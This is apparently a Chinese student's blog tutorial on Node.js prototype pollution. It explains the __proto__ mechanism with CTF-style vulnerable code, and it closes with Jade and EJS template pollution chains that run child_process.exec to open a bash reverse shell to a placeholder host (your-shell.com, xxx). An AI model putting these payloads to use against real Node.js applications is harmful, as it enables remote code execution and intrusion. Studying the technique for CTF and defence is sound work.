Node污染 (Node.js)

🎼个人主页：金灰

😎作者简介:一名简单的大一学生;易编橙·终身成长社群的嘉宾.✨

专注网络空间安全服务,期待与您的交流分享~

感谢您的点赞、关注、评论、收藏、是对我最大的认可和支持！❤️

🍊易编橙·终身成长社群🍊 : http://t.csdnimg.cn/iSLaP 期待您的加入~

免责声明:本文仅做分享~

目录

Node介绍

发展

Node常见的模板:

原型污染原理:

调试配置:(vscode)

例

jade模板污染链:

ejs的模板污染:

---

Node介绍

Node.js发布于2009年
Chrome V8引擎下的JavaScript运行环境

JavaScript js   xx.js
Java 
两者的关系，就和雷锋与雷峰塔的关系一样.

jquery VUE  (前端框架)

Chrome V8 深入支持JavaScript运行环境.

js只能操作 浏览器页面内的内容.

dom  h1 table form 
event 事件监听  --左键 右键  滑块  双击  跳转  异步请求 ajax 

发展

围绕页面，设计时，为了安全，js无法-->
1 调用操作系统api (没有办法弹出计算器)
2 访问操作系统的文件系统，最多是操作Cookie ,解决xss问题，HttpOnly 防止js钓鱼

原因就是js代码，由服务端发送给浏览器执行.

如果能够操作系统api和访问文件系统，那么只要访问含义恶意的js代码的网址.
就会执行本地的命令，明显，不合乎逻辑!

浏览器也是建立 沙箱环境 来执行js，目前已经极难看到js能够直接调用本地客户端的 api 或者 执行命令.
除IE浏览器,
js发展到后面，也就执行页面上的操作，不能执行其他操作.

js作为前端渲染用，不可或缺.

再用v8引擎增加功能，让js能够操作操作系统api和访问文件系统，
那么js也就可以作为后端，http服务器，处理逻辑问题了
-->
结果，前后端都用的js 
--2个人干的活，现在只需要1个人干

---

node -v    # 安装成功>
npm -v  # 扩展版本     pip

Node常见的模板:

express 渲染模板      --与 render_template 有点类似
Pug    --旧版叫jade	jade
Mustache
EJS
--处理数据如何附加到html页面上用的.
(插入数据的地方，写个标记，别人替换的时候，找这个标记，然后替换它对应的值.)
这个标记就是模板语法.

jade的模板     #{username}
ejs的模板语法  <%=usenrame %>
--告诉引擎，要把什么标记替换为什么数据.

---

原型污染原理:

子类通过__proto__执行父类，可以给父类增加没有的属性.
例:
var flag='flag_here';
  var secert = {};
  var sess = req.session;
  let user = {};
  utils.copy(user,req.body);
  if(secert.ctf==='36dboy'){
    res.end(flag);
  }else{
    return res.json({ret_code: 2, ret_msg: '登录失败'+JSON.stringify(user)});  
  }
污染--->
    发包时json格式.
object
{"username":"admin","password":"123123",
	"__proto__":{
	"ctf":"36dboy"
}
}

本来object对象没有ctf属性.
通过user对象执行父类的__proto__属性，拿到了object对象的引用,
然后给object对象 增加了一个ctf属性，赋值为了36dboy.
然后，当访问secret对象的ctf属性时，由于自己没有ctf属性.
就去父类也就是object类去找secret，刚好有，就拿出来用了.

---

调试配置:(vscode)

{
    // 使用 IntelliSense 了解相关属性。 
    // 悬停以查看现有属性的描述。
    // 欲了解更多信息，请访问: https://go.microsoft.com/fwlink/?linkid=830387
    "version": "0.2.0",
    "configurations": [
        {
            "type": "node",
            "request": "launch",
            "name": "Launch Program",
            "skipFiles": [
                "<node_internals>/**"
            ],
            "program": "${workspaceFolder}\\app\\app2.js"
        }
    ]
}

---

例

关键代码(附件):
var user = new function(){
    this.userinfo = new function(){
    this.isVIP = false;
    this.isAdmin = false;
    this.isAuthor = false;     
    };
  };
  utils.copy(user.userinfo,req.body);
  if(user.userinfo.isAdmin){
    return res.json({ret_code: 0, ret_msg: '登录成功'});  
  }else{
    return res.json({ret_code: 2, ret_msg: '登录失败'});  
  }

抓包-->

jade模板污染链:

{
  "__proto__": {
    "__proto__": {
      "type": "Block",
      "nodes": "",
      "compileDebug": 1,
      "self": 1,
      "line": "global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/your-shell.com/3389 0>&1\"')"
    }
  }
}
我们通过原型污染，修改了模板的某个属性的值.
然后模板引用里面的字符串，实现了Node js的代码执行.

---

 

ejs的模板污染:

{"__proto__":{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/xxx/4567 0>&1\"');var __tmp2"}}}


{"__proto__":{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/your-shell.com/3389 0>&1\"');var __tmp2"}}}

(污染错就必须重置环境,,,,)

---